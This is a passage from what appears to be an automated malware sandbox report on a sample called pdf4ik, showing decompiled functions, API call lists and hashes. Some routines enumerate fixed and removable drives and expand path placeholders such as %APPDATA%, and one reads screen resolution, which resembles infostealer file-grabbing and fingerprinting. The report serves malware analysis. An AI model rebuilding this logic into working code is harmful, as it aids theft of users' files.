                                        					goto L8;
                                        				}
                                        			}











                                        APIs
                                        • CreateFileA.KERNEL32(29D9F877,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,D9555F04,00000008,00000000,00000000), ref: 29D99137
                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D9914D
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99164
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF), ref: 29D9917D
                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99199
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D991A0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: fe034804050be5b3e56b78bdee2c669a800398bcb7b2c808b7d4574786830df8
                                        • Instruction ID: 8055f6a26c1ee1cfdb5e66f2b515c6004172f7fff5269c436b376f47269aea16
                                        • Opcode Fuzzy Hash: fe034804050be5b3e56b78bdee2c669a800398bcb7b2c808b7d4574786830df8
                                        • Instruction Fuzzy Hash: BB115172610111BBEB15AFB5DC4CEAB7B7DEF45AA0F004258F905E7280D6349942D6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E29DB23CD(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr _t48;
                                        				intOrPtr _t57;
                                        				void* _t58;
                                        				void* _t61;
                                        
                                        				_t61 = __eflags;
                                        				_t53 = __edx;
                                        				_push(0x2c);
                                        				_push(0x29dd1c30);
                                        				E29DB5A50(__ebx, __edi, __esi);
                                        				_t48 = __ecx;
                                        				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                        				_t57 =  *((intOrPtr*)(_t58 + 8));
                                        				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                        				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                        				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                        				 *((intOrPtr*)(_t58 - 0x28)) = E29DB0650(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                        				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E29DB524B(__ecx, __edx, _t61) + 0x88));
                                        				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E29DB524B(_t48, __edx, _t61) + 0x8c));
                                        				 *((intOrPtr*)(E29DB524B(_t48, _t53, _t61) + 0x88)) = _t57;
                                        				 *((intOrPtr*)(E29DB524B(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                        				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                        				 *(_t58 - 4) = 1;
                                        				 *((intOrPtr*)(_t58 - 0x1c)) = E29DB06F5(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                        				 *(_t58 - 4) = 0xfffffffe;
                                        				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                        				E29DB24F3(_t48, _t53, _t55, _t57, _t61);
                                        				return E29DB5A95( *((intOrPtr*)(_t58 - 0x1c)));
                                        			}








                                        APIs
                                        • __CreateFrameInfo.LIBCMT ref: 29DB23F5
                                          • Part of subcall function 29DB0650: __getptd.LIBCMT ref: 29DB065E
                                          • Part of subcall function 29DB0650: __getptd.LIBCMT ref: 29DB066C
                                        • __getptd.LIBCMT ref: 29DB23FF
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __getptd.LIBCMT ref: 29DB240D
                                        • __getptd.LIBCMT ref: 29DB241B
                                        • __getptd.LIBCMT ref: 29DB2426
                                        • _CallCatchBlock2.LIBCMT ref: 29DB244C
                                          • Part of subcall function 29DB06F5: __CallSettingFrame@12.LIBCMT ref: 29DB0741
                                          • Part of subcall function 29DB24F3: __getptd.LIBCMT ref: 29DB2502
                                          • Part of subcall function 29DB24F3: __getptd.LIBCMT ref: 29DB2510
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                        • String ID:
                                        • API String ID: 1602911419-0
                                        • Opcode ID: d2109489d8ce1be5902a3cd14dc67849a615787bf4b3d0e8e79f1dad8a7ef5c2
                                        • Instruction ID: d5345870c93b4f6fefe7384fd5a23d4a941eeaf8850c290256aa605783525c40
                                        • Opcode Fuzzy Hash: d2109489d8ce1be5902a3cd14dc67849a615787bf4b3d0e8e79f1dad8a7ef5c2
                                        • Instruction Fuzzy Hash: 6E11DA75C01209EFDF00DFA4D494B9D7BB0FF19314F10906DE916AB650DB389916AF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 81%
                                        			E29DB48A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int _t15;
                                        				LONG* _t21;
                                        				void* _t31;
                                        				LONG* _t33;
                                        				void* _t34;
                                        				void* _t35;
                                        
                                        				_t35 = __eflags;
                                        				_t29 = __edx;
                                        				_t25 = __ebx;
                                        				_push(0xc);
                                        				_push(0x29dd1d10);
                                        				E29DB5A50(__ebx, __edi, __esi);
                                        				_t31 = E29DB524B(__ebx, __edx, _t35);
                                        				_t15 =  *0x29dd5b98; // 0xfffffffe
                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                        					E29DB60C0(_t25, _t31, 0xd);
                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                        					_t33 =  *(_t31 + 0x68);
                                        					 *(_t34 - 0x1c) = _t33;
                                        					__eflags = _t33 -  *0x29dd5aa0; // 0x2bab1678
                                        					if(__eflags != 0) {
                                        						__eflags = _t33;
                                        						if(__eflags != 0) {
                                        							__eflags = InterlockedDecrement(_t33);
                                        							if(__eflags == 0) {
                                        								__eflags = _t33 - 0x29dd5678;
                                        								if(__eflags != 0) {
                                        									E29DADFA6(_t33);
                                        								}
                                        							}
                                        						}
                                        						_t21 =  *0x29dd5aa0; // 0x2bab1678
                                        						 *(_t31 + 0x68) = _t21;
                                        						_t33 =  *0x29dd5aa0; // 0x2bab1678
                                        						 *(_t34 - 0x1c) = _t33;
                                        						InterlockedIncrement(_t33);
                                        					}
                                        					 *(_t34 - 4) = 0xfffffffe;
                                        					E29DB493C();
                                        				} else {
                                        					_t33 =  *(_t31 + 0x68);
                                        				}
                                        				_t38 = _t33;
                                        				if(_t33 == 0) {
                                        					_push(0x20);
                                        					E29DB3393(_t29, _t38);
                                        				}
                                        				return E29DB5A95(_t33);
                                        			}










                                        APIs
                                        • __getptd.LIBCMT ref: 29DB48AD
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __amsg_exit.LIBCMT ref: 29DB48CD
                                        • __lock.LIBCMT ref: 29DB48DD
                                        • InterlockedDecrement.KERNEL32(?), ref: 29DB48FA
                                        • _free.LIBCMT ref: 29DB490D
                                        • InterlockedIncrement.KERNEL32(2BAB1678), ref: 29DB4925
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 3470314060-0
                                        • Opcode ID: 44d22823ae71a2f76bb4887e4e4c63cc6e3c4e87668f591d4a0131dbea24d294
                                        • Instruction ID: 507f676958cae5fe345c17e7bf08028f337d94a173c2fc68d77f5c6417d7777c
                                        • Opcode Fuzzy Hash: 44d22823ae71a2f76bb4887e4e4c63cc6e3c4e87668f591d4a0131dbea24d294
                                        • Instruction Fuzzy Hash: 0201A536901621ABDA25EF51905474D7360BF25751F40910DD40BBFE84CB247653FBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D95540(void* __eax, signed int __ecx, intOrPtr _a4) {
                                        				void* __esi;
                                        				intOrPtr _t18;
                                        				intOrPtr* _t20;
                                        				char* _t25;
                                        				signed int _t29;
                                        				intOrPtr* _t30;
                                        				void* _t37;
                                        				signed int _t40;
                                        				intOrPtr _t43;
                                        				intOrPtr _t45;
                                        				intOrPtr _t51;
                                        				intOrPtr* _t56;
                                        
                                        				_t40 = __ecx;
                                        				_t37 = __eax;
                                        				_t56 = __ecx;
                                        				if(__eax == 0) {
                                        					L12:
                                        					_t5 = _t56 + 0x10; // 0x68d88b02
                                        					_t18 =  *_t5;
                                        					_t45 = _a4;
                                        					if((_t40 | 0xffffffff) - _t18 <= _t45) {
                                        						_t18 = E29DAD440("string too long");
                                        					}
                                        					if(_t45 == 0) {
                                        						L30:
                                        						return _t56;
                                        					} else {
                                        						_t51 = _t18 + _t45;
                                        						if(_t51 > 0xfffffffe) {
                                        							_t18 = E29DAD440("string too long");
                                        						}
                                        						_t8 = _t56 + 0x14; // 0x29dcfb4c
                                        						_t43 =  *_t8;
                                        						if(_t43 >= _t51) {
                                        							if(_t51 != 0) {
                                        								goto L19;
                                        							} else {
                                        								 *((intOrPtr*)(_t56 + 0x10)) = _t51;
                                        								if(_t43 < 0x10) {
                                        									_t25 = _t56;
                                        									 *_t25 = 0;
                                        									return _t25;
                                        								} else {
                                        									 *((char*)( *_t56)) = 0;
                                        									return _t56;
                                        								}
                                        							}
                                        						} else {
                                        							E29D89750(_t56, _t51, _t18);
                                        							_t45 = _a4;
                                        							if(_t51 == 0) {
                                        								L29:
                                        								goto L30;
                                        							} else {
                                        								L19:
                                        								if( *(_t56 + 0x14) < 0x10) {
                                        									_t20 = _t56;
                                        								} else {
                                        									_t20 =  *_t56;
                                        								}
                                        								_t12 = _t56 + 0x10; // 0x68d88b02
                                        								E29DB0010( *_t12 + _t20, _t37, _t45);
                                        								 *((intOrPtr*)(_t56 + 0x10)) = _t51;
                                        								if( *(_t56 + 0x14) < 0x10) {
                                        									 *((char*)(_t56 + _t51)) = 0;
                                        									goto L29;
                                        								} else {
                                        									 *((char*)( *_t56 + _t51)) = 0;
                                        									return _t56;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					_t1 = _t56 + 0x14; // 0x29dcfb4c
                                        					_t40 =  *_t1;
                                        					if(_t40 < 0x10) {
                                        						_t29 = __ecx;
                                        					} else {
                                        						_t29 =  *__ecx;
                                        					}
                                        					if(_t37 < _t29) {
                                        						goto L12;
                                        					} else {
                                        						if(_t40 < 0x10) {
                                        							_t30 = _t56;
                                        						} else {
                                        							_t30 =  *_t56;
                                        						}
                                        						_t2 = _t56 + 0x10; // 0x68d88b02
                                        						if( *_t2 + _t30 <= _t37) {
                                        							goto L12;
                                        						} else {
                                        							if(_t40 < 0x10) {
                                        								return E29D89A20(_a4, _t40, _t56, _t56, _t37 - _t56);
                                        							} else {
                                        								return E29D89A20(_a4, _t40, _t56, _t56, _t37 -  *_t56);
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}
















                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D955B4
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D955CF
                                        • _memmove.LIBCMT ref: 29D95625
                                          • Part of subcall function 29D89A20: std::_Xinvalid_argument.LIBCPMT ref: 29D89A38
                                          • Part of subcall function 29D89A20: std::_Xinvalid_argument.LIBCPMT ref: 29D89A56
                                          • Part of subcall function 29D89A20: std::_Xinvalid_argument.LIBCPMT ref: 29D89A71
                                          • Part of subcall function 29D89A20: _memmove.LIBCMT ref: 29D89AD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                        • String ID: \Desktop\$string too long
                                        • API String ID: 2168136238-3537509313
                                        • Opcode ID: 4c0e4ba009df682ff9db3f9b0cb6869ad973abb81a5541ae916b0ae39426d716
                                        • Instruction ID: e898a4eb85fcafdb9b28256ed2e4053e3f2328ded136d70654fb528840cd01a3
                                        • Opcode Fuzzy Hash: 4c0e4ba009df682ff9db3f9b0cb6869ad973abb81a5541ae916b0ae39426d716
                                        • Instruction Fuzzy Hash: D931EA723206109BE324DE6CD8C095AF7EAEFA1660720463EE9468FE52D771D84293A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E29DA35C0(void* __eflags, intOrPtr _a4) {
                                        				struct HWND__* _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				char _v32;
                                        				char _v48;
                                        				intOrPtr _v56;
                                        				char _v60;
                                        				char _v76;
                                        				intOrPtr _v84;
                                        				char _v88;
                                        				char _v104;
                                        				intOrPtr _v112;
                                        				char _v132;
                                        				intOrPtr _v136;
                                        				struct HWND__* _v140;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				signed int _t36;
                                        				int _t40;
                                        				int _t41;
                                        				void* _t43;
                                        				void* _t44;
                                        				void* _t46;
                                        				void* _t48;
                                        				void* _t63;
                                        				void* _t77;
                                        				struct HDC__* _t79;
                                        				void* _t82;
                                        				signed int _t83;
                                        				void* _t84;
                                        				void* _t88;
                                        				void* _t90;
                                        
                                        				_t90 = __eflags;
                                        				_push(0xffffffff);
                                        				_push(E29DC2EF0);
                                        				_push( *[fs:0x0]);
                                        				_t35 =  *0x29dd5664; // 0xd9555f04
                                        				_t36 = _t35 ^ _t83;
                                        				_v20 = _t36;
                                        				_push(_t36);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v136 = _a4;
                                        				_v140 = 0;
                                        				_t79 = CreateDCA("DISPLAY", 0, 0, 0);
                                        				_t40 = GetDeviceCaps(_t79, 8);
                                        				_t41 = GetDeviceCaps(_t79, 0xa);
                                        				ReleaseDC(0, _t79);
                                        				_t43 = E29DA4720( &_v132, _t90, _t41);
                                        				_v8 = 0;
                                        				_t44 = E29DA4720( &_v104, _t90, _t40);
                                        				_v8 = 1;
                                        				_t46 = E29D89930(0x29dcd617,  &_v76, _t44);
                                        				_v8 = 2;
                                        				_t48 = E29D95410("x",  &_v48, _t46);
                                        				_t76 = _v136;
                                        				_v8 = 3;
                                        				E29D89980(_t43, _t48, _v136);
                                        				_t88 = _t84 - 0x80 + 0xc;
                                        				if(_v28 >= 0x10) {
                                        					_push(_v48);
                                        					E29DADF3B();
                                        					_t88 = _t88 + 4;
                                        				}
                                        				_v28 = 0xf;
                                        				_v32 = 0;
                                        				_v48 = 0;
                                        				if(_v56 >= 0x10) {
                                        					_t73 = _v76;
                                        					_push(_v76);
                                        					E29DADF3B();
                                        					_t88 = _t88 + 4;
                                        				}
                                        				_v56 = 0xf;
                                        				_v60 = 0;
                                        				_v76 = 0;
                                        				if(_v84 >= 0x10) {
                                        					_push(_v104);
                                        					E29DADF3B();
                                        					_t88 = _t88 + 4;
                                        				}
                                        				_v84 = 0xf;
                                        				_v88 = 0;
                                        				_v104 = 0;
                                        				if(_v112 >= 0x10) {
                                        					_push(_v132);
                                        					E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t77);
                                        				_pop(_t82);
                                        				_pop(_t63);
                                        				return E29DADF46(_t76, _t63, _v20 ^ _t83, _t73, _t77, _t82);
                                        			}







































                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 29DA360C
                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 29DA3617
                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 29DA3622
                                        • ReleaseDC.USER32(00000000,00000000), ref: 29DA362D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CapsDevice$CreateRelease
                                        • String ID: DISPLAY
                                        • API String ID: 2571409768-865373369
                                        • Opcode ID: 36050988b741c09172eb5d5f36ab17e687bbe6b49b0519f37d701a4c1641dcf1
                                        • Instruction ID: 141a7e3ef3cc4d74b7a99503707a5210e9a70073965c81c9b326b3d2679df8a1
                                        • Opcode Fuzzy Hash: 36050988b741c09172eb5d5f36ab17e687bbe6b49b0519f37d701a4c1641dcf1
                                        • Instruction Fuzzy Hash: D641C3B2D01388AFDB00DFA8D885BDEFBB9AF14700F14806DE509A7741DB745A05DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D894C0(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                        				intOrPtr _t15;
                                        				intOrPtr _t16;
                                        				intOrPtr* _t18;
                                        				char* _t24;
                                        				intOrPtr _t34;
                                        				intOrPtr* _t36;
                                        				intOrPtr _t42;
                                        				intOrPtr _t43;
                                        				intOrPtr* _t50;
                                        
                                        				_t34 = _a8;
                                        				_t50 = __ecx;
                                        				_t36 = _a4;
                                        				_t42 =  *((intOrPtr*)(_t36 + 0x10));
                                        				if(_t42 < _t34) {
                                        					E29DAD48D("invalid string position");
                                        				}
                                        				_t15 = _a12;
                                        				_t43 = _t42 - _t34;
                                        				if(_t15 < _t43) {
                                        					_t43 = _t15;
                                        				}
                                        				if(_t50 != _t36) {
                                        					if(_t43 > 0xfffffffe) {
                                        						E29DAD440("string too long");
                                        					}
                                        					_t16 =  *((intOrPtr*)(_t50 + 0x14));
                                        					if(_t16 >= _t43) {
                                        						if(_t43 != 0) {
                                        							goto L10;
                                        						} else {
                                        							 *((intOrPtr*)(_t50 + 0x10)) = _t43;
                                        							if(_t16 < 0x10) {
                                        								_t24 = _t50;
                                        								 *_t24 = 0;
                                        								return _t24;
                                        							} else {
                                        								 *((char*)( *_t50)) = 0;
                                        								return _t50;
                                        							}
                                        						}
                                        					} else {
                                        						E29D89750(_t50, _t43,  *((intOrPtr*)(_t50 + 0x10)));
                                        						_t36 = _a4;
                                        						if(_t43 == 0) {
                                        							L22:
                                        							return _t50;
                                        						} else {
                                        							L10:
                                        							if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
                                        								_t36 =  *_t36;
                                        							}
                                        							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
                                        								_t18 = _t50;
                                        							} else {
                                        								_t18 =  *_t50;
                                        							}
                                        							E29DB0010(_t18, _t36 + _t34, _t43);
                                        							 *((intOrPtr*)(_t50 + 0x10)) = _t43;
                                        							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
                                        								 *((char*)(_t50 + _t43)) = 0;
                                        								goto L22;
                                        							} else {
                                        								 *((char*)( *_t50 + _t43)) = 0;
                                        								return _t50;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					E29D896C0(_t50, _t43 + _t34, 0xffffffff);
                                        					E29D896C0(_t50, 0, _t34);
                                        					return _t50;
                                        				}
                                        			}













                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D894DA
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89517
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        • _memmove.LIBCMT ref: 29D89578
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                        • String ID: invalid string position$string too long
                                        • API String ID: 1615890066-4289949731
                                        • Opcode ID: f85b973faba8fa22c227bea5915aa70686654762f6faf1e19b7269c6be5e2281
                                        • Instruction ID: bf23852c6651c7b7e0478cdead934888254aa70d96661d9f5e8671a3b84e9fbf
                                        • Opcode Fuzzy Hash: f85b973faba8fa22c227bea5915aa70686654762f6faf1e19b7269c6be5e2281
                                        • Instruction Fuzzy Hash: 5431D7333042109BD7208E5CEC84A5EF3A9FFB1664F20066FF182CBA52C671D94393A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E29D90FA9(void* __edi) {
                                        				int _t45;
                                        				void* _t49;
                                        				int _t54;
                                        				signed int _t59;
                                        				CHAR* _t70;
                                        				void* _t75;
                                        				signed int _t76;
                                        				void* _t79;
                                        				signed int _t80;
                                        				signed int _t84;
                                        				void* _t98;
                                        				signed int* _t99;
                                        				void* _t100;
                                        				CHAR* _t101;
                                        				CHAR* _t103;
                                        				signed int _t104;
                                        				signed int _t105;
                                        				void* _t106;
                                        				signed int _t107;
                                        				signed int _t108;
                                        				void* _t110;
                                        				signed int _t111;
                                        				void* _t113;
                                        
                                        				_t98 = __edi;
                                        				do {
                                        					_t101 =  *(_t111 - 0x1948);
                                        					_t45 = GetDriveTypeA(_t101);
                                        					if( *((intOrPtr*)(_t111 - 0x195c)) == 0) {
                                        						L5:
                                        						 *0x29dd85cc(_t111 - 0x950, _t111 - 0x3f8);
                                        						_t76 = StrStrA(_t111 - 0x950, "%DRIVE_FIXED%");
                                        						_t49 = _t111 - 0x950;
                                        						__eflags = _t76;
                                        						if(__eflags != 0) {
                                        							_t110 = _t76 - _t49;
                                        							 *0x29dd8498(0x29dd8830, _t49, _t110);
                                        							_t80 = _t76 + 0xd;
                                        							__eflags = _t80;
                                        							_t12 = _t110 + 0x29dd8830; // 0x29dd8830
                                        							_t70 = _t12;
                                        							 *_t70 = 0;
                                        							wsprintfA(_t70, "%s%s",  *(_t111 - 0x1948), _t80);
                                        							_t113 = _t113 + 0x10;
                                        							_t49 = 0x29dd8830;
                                        						}
                                        						_push(_t49);
                                        						_push(_t111 - 0x950);
                                        					} else {
                                        						_t117 = _t45 - 2;
                                        						if(_t45 != 2) {
                                        							goto L5;
                                        						} else {
                                        							 *0x29dd85cc(_t111 - 0x950, _t111 - 0x3f8);
                                        							_t75 = E29DA4650(_t111 - 0x950, "%DRIVE_REMOVABLE%", _t101);
                                        							_t113 = _t113 + 8;
                                        							_push(_t75);
                                        							_push(_t111 - 0x950);
                                        							goto L8;
                                        						}
                                        					}
                                        					L8:
                                        					 *0x29dd85cc();
                                        					_t84 =  *(_t111 - 0x1958);
                                        					E29D90820( *((intOrPtr*)(_t111 - 0x194c)), _t84, _t111 - 0x950, _t98,  *((intOrPtr*)(_t111 + 0x1c)), _t117, _t111 - 0x950,  *(_t111 - 0x1954),  *((intOrPtr*)(_t111 + 0x18)),  *((intOrPtr*)(_t111 + 0xc)),  *((intOrPtr*)(_t111 - 0x1960)));
                                        					_t103 =  *(_t111 - 0x1948);
                                        					_t113 = _t113 + 0x14;
                                        					_t54 = lstrlenA(_t103);
                                        					 *(_t111 - 0x1948) =  &(_t103[_t54 + 1]);
                                        				} while (_t103[_t54 + 1] != 0);
                                        				_t99 =  *(_t111 - 0x1954);
                                        				if(_t99 != 0) {
                                        					__eflags =  *_t99 - 2;
                                        					if( *_t99 == 2) {
                                        						_t104 = _t99[1];
                                        						__eflags =  *((char*)(_t104 + 0x2c));
                                        						if( *((char*)(_t104 + 0x2c)) == 0) {
                                        							E29DAD160(_t104, 0x10000, _t84);
                                        						}
                                        						_t96 =  *(_t104 + 0x20);
                                        						asm("sbb eax, eax");
                                        						_t59 = ( ~( *(_t104 + 0x20)) & 0xfffe0000) + 0x20000;
                                        						__eflags = _t59;
                                        						 *((char*)(_t104 + 0x2c)) = 1;
                                        						_t105 =  *(_t104 + 0x18);
                                        						 *0x29dd8814 = _t59;
                                        					} else {
                                        						_t105 =  *(_t111 - 0x1950);
                                        						_t96 =  *(_t111 - 0x1950);
                                        						 *0x29dd8814 = 0x80000;
                                        					}
                                        				} else {
                                        					_t96 = 0;
                                        					_t105 = 0;
                                        					 *0x29dd8814 = 0x10000;
                                        				}
                                        				_t60 =  *(_t111 - 0x1950);
                                        				if(_t60 != 0) {
                                        					__eflags =  *_t60 - 2;
                                        					if( *_t60 == 2) {
                                        						_t84 =  *(_t60 + 4);
                                        						 *0x29dd8814 = E29DAC840(_t84, _t96, _t111 - 0x1508, _t105, 3);
                                        					} else {
                                        						 *0x29dd8814 = 0x80000;
                                        					}
                                        				} else {
                                        					 *0x29dd8814 = 0x10000;
                                        				}
                                        				if(_t99 == 0) {
                                        					 *0x29dd8814 = 0x10000;
                                        				} else {
                                        					_t60 =  *_t99;
                                        					if((_t84 & 0xffffff00 | _t60 == 0x00000001) == 0) {
                                        						__eflags = _t60 - 2;
                                        						if(_t60 == 2) {
                                        							_t107 = _t99[1];
                                        							 *0x29dd8814 = E29DAC130(_t107);
                                        							__eflags = _t107;
                                        							if(_t107 != 0) {
                                        								E29DAD2E0(_t107);
                                        							}
                                        							L33:
                                        							_push(_t99);
                                        							_t60 = E29DADF3B();
                                        							L34:
                                        							 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0xc));
                                        							_pop(_t100);
                                        							_pop(_t106);
                                        							_pop(_t79);
                                        							return E29DADF46(_t60, _t79,  *(_t111 - 0x10) ^ _t111, _t96, _t100, _t106);
                                        						}
                                        						 *0x29dd8814 = 0x80000;
                                        						goto L34;
                                        					}
                                        					if(_t60 == 1) {
                                        						_t108 = _t99[1];
                                        						 *0x29dd86b0 = E29D8E390(_t108);
                                        						__eflags = _t108;
                                        						if(_t108 != 0) {
                                        							E29D8E4A0(_t108);
                                        						}
                                        						goto L33;
                                        					}
                                        					 *0x29dd86b0 = 0x80000;
                                        				}
                                        			}



























                                        APIs
                                        • GetDriveTypeA.KERNEL32(00000000), ref: 29D90FB7
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90FD9
                                          • Part of subcall function 29DA4650: StrStrA.SHLWAPI(?,?,000F4240,?,?,29D909A9,%APPDATA%,?), ref: 29DA465C
                                        • lstrcpy.KERNEL32(?,?), ref: 29D9100B
                                        • StrStrA.SHLWAPI(?,%DRIVE_FIXED%), ref: 29D9101D
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D9103C
                                        • wsprintfA.USER32 ref: 29D9105C
                                        • lstrcpy.KERNEL32(?,?), ref: 29D91072
                                        • lstrlenA.KERNEL32(?), ref: 29D910B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$DriveTypelstrcpynlstrlenwsprintf
                                        • String ID: %DRIVE_REMOVABLE%
                                        • API String ID: 216543645-3528989341
                                        • Opcode ID: 1f2cd741bd46edb0a6568c0afb66886be392defd6ca10b09adeab8ecf3879691
                                        • Instruction ID: 50e2d26df1c8550058a285655352eba62ccb6677f76fe933c3e01221ee81b541
                                        • Opcode Fuzzy Hash: 1f2cd741bd46edb0a6568c0afb66886be392defd6ca10b09adeab8ecf3879691
                                        • Instruction Fuzzy Hash: CE31C8769112159BD715EF40DC50EEAB3BAFF84359F04809EE909A3600D7346A86DFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 23%
                                        			E29DA3D50(intOrPtr* __esi, intOrPtr _a4) {
                                        				void* _v8;
                                        				char _v12;
